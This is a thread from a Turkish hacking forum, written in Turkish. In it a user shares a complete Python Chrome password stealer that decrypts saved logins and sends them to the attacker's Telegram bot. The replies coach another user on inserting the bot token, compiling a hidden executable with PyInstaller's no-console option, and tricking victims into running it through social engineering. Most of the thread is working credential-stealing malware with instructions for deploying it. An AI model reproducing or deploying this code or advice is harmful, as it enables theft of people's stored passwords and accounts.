Python ile Chrome Şifrelerini Çalmak!

1 Ara 2020
76
89
İstanbul
Python dosyası olarak atarsan evet bu mümkün.
Python, stealer mantığındaki uygulamalar için pek mantıklı bir tercih değil. Exe haline getirebilmek için içine küçük bir yorumlayıcı ve paketleri tıkıştırmak gerekiyor. Verdiğiniz örnek kodu build edince bile 3.5 mb bir dosya oluştu. Bu hali ile av uygulamalarının vik vik öteceğini düşünürsek kodu biraz daha modifiye edersek toplam boyut dahada büyüyecektir.

Üstüne birde bir dosya ile birleştirirse kocaman şişko bir stealer uygulamamız olur.

Düz Python dosyasını yutturmak daha mantıklı.

Mamilate

Üye
12 Kas 2023
174
72
Python, stealer mantığındaki uygulamalar için pek mantıklı bir tercih değil. Exe haline getirebilmek için içine küçük bir yorumlayıcı ve paketleri tıkıştırmak gerekiyor. Verdiğiniz örnek kodu build edince bile 3.5 mb bir dosya oluştu. Bu hali ile av uygulamalarının vik vik öteceğini düşünürsek kodu biraz daha modifiye edersek toplam boyut dahada büyüyecektir.

Üstüne birde bir dosya ile birleştirirse kocaman şişko bir stealer uygulamamız olur.

Düz Python dosyasını yutturmak daha mantıklı.
Birincisi python dosyasını yutturmak için hedefte python yüklü artıdan gerekli kütüphanelerin de yüklü olması lazım. Kimsenin senin kadar şey olmadığını düşünürsek bu neredeyse imkansız. İkincisi anlaşılan sosyal mühendislik hakkında bir halt bilmiyorsun o konuyu araştırmanı tavsiye ederim. Ben sana hedefe direkt exe haline çevir sonra bu exe dosyasını at demiyorum milyon tane yöntem var uygun olanı seçip uygulayabilirsin. Bu konunun daha fazla uzamaması için sana verdiğim son cevap.

1 Ara 2020
76
89
İstanbul
Birincisi python dosyasını yutturmak için hedefte python yüklü artıdan gerekli kütüphanelerin de yüklü olması lazım. Kimsenin senin kadar şey olmadığını düşünürsek bu neredeyse imkansız. İkincisi anlaşılan sosyal mühendislik hakkında bir halt bilmiyorsun o konuyu araştırmanı tavsiye ederim. Ben sana hedefe direkt exe haline çevir sonra bu exe dosyasını at demiyorum milyon tane yöntem var uygun olanı seçip uygulayabilirsin. Bu konunun daha fazla uzamaması için sana verdiğim son cevap.
"şey olmadığını düşünürsek" mi? Şey ne? :ROFLMAO:
Bahsettiğin milyon yöntem arasında Python yok, bunu söylüyorum.
Seninde ironiden anlamadığın belli, neyse sen devam et çok bilmiş kardeşim.

15 Mar 2022
81
21

Herkese merhaba, bugün sizlere python ile yazılmış olan chrome şifre grabberi paylaşacağım. Bu kod hedef bilgisayarda çalıştırıldığında hedefin chrome daki tüm kayıtlı şifrelerini telegram yoluyla hackera iletmeyi sağlar.

Daha önceki konularıma şuradan ulaşabilirsiniz:

Python ile Hedefi Deli Etmek!
Python ile RansomWare

NOT: ŞİFRELEME İŞLERİNDEN PEK ANLAMADIĞIM İÇİN KODUN YARISINI BAŞKA YERDEN ALDIM.
EĞİTİM AMAÇLIDIR SORUMLULUK KABUL ETMİYORUM

Chrome Şifre Grabber:
Python:
import os
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil
import requests

def encryption_key():
    local_state_yolu = os.path.join(os.environ["USERPROFILE"],
                                    "AppData", "Local", "Google", "Chrome",
                                    "User Data", "Local State")
    with open(local_state_yolu, "r", encoding="utf-8") as f:
        local_state = f.read()
        local_state = json.loads(local_state)

key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
    key = key[5:]
    return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]

def decrypt_password(password, key):
    try:
        iv = password[3:15]
        password = password[15:]
        cipher = AES.new(key, AES.MODE_GCM, iv)
        return cipher.decrypt(password)[:-16].decode()
    except:
        try:
            return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
        except:
            return ""

def send_telegram_document(bot_token, chat_id, document_path):
    url = f"https://api.telegram.org/bot{bot_token}/sendDocument"
    files = {'document': open(document_path, 'rb')}
    params = {
        "chat_id": chat_id,
    }
    try:
        response = requests.post(url, params=params, files=files)
    except:
        pass

def main():
    key = encryption_key()
    db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
                           "Google", "Chrome", "User Data", "default", "Login Data")
    filename = "ChromeData.db"
    shutil.copyfile(db_path, filename)
    db = sqlite3.connect(filename)
    cursor = db.cursor()
    cursor.execute(
        "select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created")

credentials = []
    for row in cursor.fetchall():
        origin_url = row[0]
        action_url = row[1]
        username = row[2]
        password = decrypt_password(row[3], key)
        date_created = row[4]
        date_last_used = row[5]
        if username or password:
            credentials.append({
                "Origin URL": origin_url,
                "Action URL": action_url,
                "Username": username,
                "Password": password
            })

cursor.close()
    db.close()
    try:
        os.remove(filename)
    except:
        pass

if credentials:
        bot_token = "BOT TOKENİNİZ"
        chat_id = "CHAT ID NİZ"
        document_path = "credentials.txt"

with open(document_path, "w") as file:
            json.dump(credentials, file, indent=4)

send_telegram_document(bot_token, chat_id, document_path)
        os.remove(document_path)

if __name__ == "__main__":
    main()

Kodumuz bu kadardı, şimdi bakalım telegram adresimize istediğimiz bilgiler düşmüş mü?

agsycx3.png

pj66oqi.png

ve gördüğünüz gibi hedef makinedeki kayıtlı tüm chrome şifrelerini çaldık. Kodu aynı şekilde başka tarayıcılar içinde uygun hale getirebilirsiniz. Konuyu kısa tutmak adına kodu açıklamıyacağım, fakat isteyen varsa dm den veya burdan yazarsa açıklarım.
Okuduğunuz için teşekkürler ...
öncelikle elinize saplık bu kodlarda hangi bölümlere CHAT ID ve TOKENİ ekleyeceğiz ve dosyayı .EXE formatına çevirmek yeterlimi bunları anlatırsanız sevinirim

Mamilate

Üye
12 Kas 2023
174
72
öncelikle elinize saplık bu kodlarda hangi bölümlere CHAT ID ve TOKENİ ekleyeceğiz ve dosyayı .EXE formatına çevirmek yeterlimi bunları anlatırsanız sevinirim
Teşekkürler. Kodun en altında if credentialsın içinde nereye eklemeniz gerektiğini belirttim. Exe ye çevirme işlemine gelince ne yapacağınıza göre değişiklik gösterir. Birisine atacaksanız exe dosyası olarak atmanız en doğrusu tabii ki. Fakat sosyal mühendislik olmadan kimse yükleyip açmaz. Kısacası tamamen size kalmış.

15 Mar 2022
81
21
Teşekkürler. Kodun en altında if credentialsın içinde nereye eklemeniz gerektiğini belirttim. Exe ye çevirme işlemine gelince ne yapacağınıza göre değişiklik gösterir. Birisine atacaksanız exe dosyası olarak atmanız en doğrusu tabii ki. Fakat sosyal mühendislik olmadan kimse yükleyip açmaz. Kısacası tamamen size kalmış.
cevap için teşekkür ederim gösterdiğiniz yerlere token ve ıd numaramı ekledim dosyayı .exe çevirdim tıkladım ama telegram botuma hiç bir bilgi gelmedi bu yüzden yazıyorum aslında hatam nedir?

Mamilate

Üye
12 Kas 2023
174
72
--onefile parametresini eklemen lazım ve tabi ki hedefe yutturacağın için --noconsole da lazım. Onefile parametresi bütün gerekli şeyleri tek bir dosyada toplamanı sağlar, noconsole ise konsol gözükmemesini sağlar.

15 Mar 2022
81
21
--onefile parametresini eklemen lazım ve tabi ki hedefe yutturacağın için --noconsole da lazım. Onefile parametresi bütün gerekli şeyleri tek bir dosyada toplamanı sağlar, noconsole ise konsol gözükmemesini sağlar.
teşekkürler bunu nasıl yapacağımı biraz araştırayım, her bilgi önemli teşekkür ederim vakit ayırdığınız için.

pyinstaller --onefile --noconsole grabber.py ile derledim söylediğiniz gibi tıkladığım zaman hiç bir reaksiyon göstermiyor ve telegram botuma bilgi gelmiyor hata nedir acaba

Mamilate

Üye
12 Kas 2023
174
72
pyinstaller --onefile --noconsole grabber.py ile derledim söylediğiniz gibi tıkladığım zaman hiç bir reaksiyon göstermiyor ve telegram botuma bilgi gelmiyor hata nedir acaba
Eğer doğru uyguladıysanız normal şartlarda çalışması gerek, terminalden çalıştırır mısınız exe yi hata mesajına Bi bakalım

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.